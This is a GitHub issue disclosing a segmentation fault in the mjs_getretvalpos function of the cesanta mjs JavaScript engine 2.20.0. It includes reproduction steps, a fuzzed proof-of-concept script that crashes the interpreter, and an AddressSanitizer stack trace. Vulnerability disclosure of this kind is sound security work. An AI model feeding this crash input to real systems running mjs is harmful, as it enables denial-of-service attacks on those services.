Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SEGV in mjs_getretvalpos #251

Open
vorfreuder opened this issue Nov 18, 2023 · 0 comments
Open

SEGV in mjs_getretvalpos #251

vorfreuder opened this issue Nov 18, 2023 · 0 comments

Comments

@vorfreuder
Copy link

vorfreuder commented Nov 18, 2023
edited

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remtoe attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.

Vulnerability Type
segmentation violation

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
poc 
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888    true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

ASAN info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
    #8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
    #9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
    #10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@vorfreuder